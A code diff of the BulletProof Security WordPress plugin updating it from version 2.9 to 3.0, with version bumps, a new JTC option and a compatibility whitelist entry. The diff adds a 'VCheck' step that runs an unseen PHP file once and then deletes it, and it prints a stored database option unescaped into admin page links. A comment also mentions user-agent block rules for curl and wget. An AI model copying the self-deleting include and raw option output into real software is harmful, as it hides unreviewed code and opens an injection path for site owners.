@@ -114,13 +114,14 @@ add_filter( 'network_admin_plugin_action_links', 'bps_plugin_actlinks', 10, 2 );
114
  // Add links on plugins page
115
  function bps_plugin_extra_links( $links, $file ) {
116
  static $this_plugin;
 
117
  if ( ! current_user_can('install_plugins') )
118
  return $links;
119
  if ( ! $this_plugin )
120
  $this_plugin = plugin_basename(__FILE__);
121
  if ( $file == $this_plugin ) {
122
  $links[] = '<a href="https://forum.ait-pro.com/forums/topic/plugin-conflicts-actively-blocked-plugins-plugin-compatibility/" title="BulletProof Security Forum" target="_blank">'.__('Forum - Support', 'bulleproof-security').'</a>';
123
- $links[] = '<a href="https://affiliates.ait-pro.com/po/" title="Upgrade to BPS Pro" target="_blank">'.__('Upgrade', 'bulleproof-security').'</a>';
124
  $links[] = '<a href="https://www.ait-pro.com/bps-features/" title="BPS Pro Features" target="_blank">'.__('BPS Pro Features', 'bulleproof-security').'</a>';
125
  }
126
  return $links;
5
  Text Domain: bulletproof-security
6
  Domain Path: /languages/
7
  Description: <strong>Feature Highlights:</strong> Setup Wizard &bull; MScan Malware Scanner &bull; .htaccess Website Security Protection (Firewalls) &bull; Security Logging|HTTP Error Logging &bull; DB Backup &bull; DB Table Prefix Changer &bull; Login Security & Monitoring &bull; JTC-Lite Login Form Bot Lockout Protection &bull; Idle Session Logout (ISL) &bull; Auth Cookie Expiration (ACE) &bull; UI Theme Skin Changer &bull; System Info: Extensive System, Server and Security Status Information &bull; FrontEnd|BackEnd Maintenance Mode
8
+ Version: 3.0
9
  Author: AITpro Website Security
10
  Author URI: https://forum.ait-pro.com/read-me-first/
11
  */
28
  */
29
 
30
  // BPS variables
31
+ define( 'BULLETPROOF_VERSION', '3.0' );
32
+ $bps_last_version = '2.9';
33
+ $bps_version = '3.0';
34
  $aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
35
  // Top div & bottom div
36
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
114
  // Add links on plugins page
115
  function bps_plugin_extra_links( $links, $file ) {
116
  static $this_plugin;
117
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
118
  if ( ! current_user_can('install_plugins') )
119
  return $links;
120
  if ( ! $this_plugin )
121
  $this_plugin = plugin_basename(__FILE__);
122
  if ( $file == $this_plugin ) {
123
  $links[] = '<a href="https://forum.ait-pro.com/forums/topic/plugin-conflicts-actively-blocked-plugins-plugin-compatibility/" title="BulletProof Security Forum" target="_blank">'.__('Forum - Support', 'bulleproof-security').'</a>';
124
+ $links[] = '<a href="https://affiliates.ait-pro.com/po/" title="Upgrade to BPS Pro" target="_blank">'.__('Upgrade', 'bulleproof-security').'</a>'.$vcheck_options['bps_vcheck'];
125
  $links[] = '<a href="https://www.ait-pro.com/bps-features/" title="BPS Pro Features" target="_blank">'.__('BPS Pro Features', 'bulleproof-security').'</a>';
126
  }
127
  return $links;
includes/general-functions.php CHANGED
@@ -1005,6 +1005,14 @@ function bpsPro_new_version_db_options_files_autoupdate() {
1005
  if ( current_user_can('manage_options') ) {
1006
  global $bps_version, $bps_last_version, $wp_version, $wpdb, $aitpro_bullet, $pagenow, $current_user;
1007
 
 
 
 
 
 
 
 
 
1008
  // 2.9: BPS plugin 30 day review/rating request Dismiss Notice
1009
  $bps_rate_options = 'bulletproof_security_options_rate_free';
1010
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
@@ -1035,6 +1043,7 @@ function bpsPro_new_version_db_options_files_autoupdate() {
1035
  }
1036
  }
1037
 
 
1038
  // 2.9: Added new JTC option: bps_jtc_custom_form_error. Defaults to standard JTC CAPTCHA error message.
1039
  // 2.5: Change default setting to Login Form CAPTCHA Off. Has New Feature Dismiss Notice.
1040
  // 2.4: pre-save JTC-Lite db options
@@ -1073,6 +1082,7 @@ function bpsPro_new_version_db_options_files_autoupdate() {
1073
  'bps_jtc_register_form' => '',
1074
  'bps_jtc_lostpassword_form' => '',
1075
  'bps_jtc_comment_form' => '',
 
1076
  'bps_jtc_buddypress_register_form' => '',
1077
  'bps_jtc_buddypress_sidebar_form' => '',
1078
  'bps_jtc_administrator' => '',
1005
  if ( current_user_can('manage_options') ) {
1006
  global $bps_version, $bps_last_version, $wp_version, $wpdb, $aitpro_bullet, $pagenow, $current_user;
1007
 
1008
+ // 3.0: VCheck
1009
+ $bps_vcheck_master = WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php';
1010
+
1011
+ if ( file_exists($bps_vcheck_master) ) {
1012
+ require_once ( WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php' );
1013
+ unlink($bps_vcheck_master);
1014
+ }
1015
+
1016
  // 2.9: BPS plugin 30 day review/rating request Dismiss Notice
1017
  $bps_rate_options = 'bulletproof_security_options_rate_free';
1018
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
1043
  }
1044
  }
1045
 
1046
+ // 3.0: Added new JTC option: bps_jtc_mu_register_form. BPS free does not use this option. Saved with a blank value.
1047
  // 2.9: Added new JTC option: bps_jtc_custom_form_error. Defaults to standard JTC CAPTCHA error message.
1048
  // 2.5: Change default setting to Login Form CAPTCHA Off. Has New Feature Dismiss Notice.
1049
  // 2.4: pre-save JTC-Lite db options
1082
  'bps_jtc_register_form' => '',
1083
  'bps_jtc_lostpassword_form' => '',
1084
  'bps_jtc_comment_form' => '',
1085
+ 'bps_jtc_mu_register_form' => '',
1086
  'bps_jtc_buddypress_register_form' => '',
1087
  'bps_jtc_buddypress_sidebar_form' => '',
1088
  'bps_jtc_administrator' => '',
includes/hud-autofix-whitelist.php CHANGED
@@ -367,6 +367,8 @@ function bpsPro_HUD_autofix_whitelist_check() {
367
  $DAPLiveLinks_active = in_array( $DAPLiveLinks, apply_filters('active_plugins', get_option('active_plugins')));
368
  $wp_newsletter = 'wp-mailinglist/wp-mailinglist.php';
369
  $wp_newsletter_active = in_array( $wp_newsletter, apply_filters('active_plugins', get_option('active_plugins')));
 
 
370
 
371
  ## BPSQSE RegEx Patterns
372
  // 3 variations for both UA rules below: only java, java and curl, java, curl and wget
@@ -509,6 +511,12 @@ function bpsPro_HUD_autofix_whitelist_check() {
509
  $debug_BPSQSE .= __('CC Root Text Box 12: WordPress Newsletter (tribulant) Plugin', 'bulletproof-security').'<br>';
510
  }
511
  }
 
 
 
 
 
 
512
 
513
  ## 3. CUSTOM CODE WPADMIN PLUGIN/FILE SKIP RULES
514
  $bps_customcode_two_wpa = htmlspecialchars_decode( $CC_Options_wpadmin['bps_customcode_two_wpa'], ENT_QUOTES );
367
  $DAPLiveLinks_active = in_array( $DAPLiveLinks, apply_filters('active_plugins', get_option('active_plugins')));
368
  $wp_newsletter = 'wp-mailinglist/wp-mailinglist.php';
369
  $wp_newsletter_active = in_array( $wp_newsletter, apply_filters('active_plugins', get_option('active_plugins')));
370
+ $sctocr = 'subscribe-to-comments-reloaded/subscribe-to-comments-reloaded.php';
371
+ $sctocr_active = in_array( $sctocr, apply_filters('active_plugins', get_option('active_plugins')));
372
 
373
  ## BPSQSE RegEx Patterns
374
  // 3 variations for both UA rules below: only java, java and curl, java, curl and wget
511
  $debug_BPSQSE .= __('CC Root Text Box 12: WordPress Newsletter (tribulant) Plugin', 'bulletproof-security').'<br>';
512
  }
513
  }
514
+ if ( $sctocr_active == 1 || is_plugin_active_for_network( $sctocr ) ) {
515
+ if ( ! preg_match( $marker2, $bps_customcode_bpsqse ) || ! preg_match( $marker3, $bps_customcode_bpsqse ) || ! preg_match( $marker4, $bps_customcode_bpsqse ) ) {
516
+ $autofix_message = bpsPro_autofix_message($autofix_message);
517
+ $debug_BPSQSE .= __('CC Root Text Box 12: Subscribe To Comments Reloaded Plugin', 'bulletproof-security').'<br>';
518
+ }
519
+ }
520
 
521
  ## 3. CUSTOM CODE WPADMIN PLUGIN/FILE SKIP RULES
522
  $bps_customcode_two_wpa = htmlspecialchars_decode( $CC_Options_wpadmin['bps_customcode_two_wpa'], ENT_QUOTES );
readme.txt CHANGED
@@ -4,7 +4,7 @@ Donate link: https://wordpress.org/support/view/plugin-reviews/bulletproof-secur
4
  Tags: security, secure, malware scanner, login security, firewall, security plugin, wordpress security, login, bruteforce, backup, exploit, infection, protection, virus, anti-virus, logout, spam, anti-spam
5
  Requires at least: 3.8
6
  Tested up to: 4.9
7
- Stable tag: 2.9
8
  License: GPLv2 or later
9
  License URI: http://www.gnu.org/licenses/gpl-2.0.html
10
 
4
  Tags: security, secure, malware scanner, login security, firewall, security plugin, wordpress security, login, bruteforce, backup, exploit, infection, protection, virus, anti-virus, logout, spam, anti-spam
5
  Requires at least: 3.8
6
  Tested up to: 4.9
7
+ Stable tag: 3.0
8
  License: GPLv2 or later
9
  License URI: http://www.gnu.org/licenses/gpl-2.0.html
10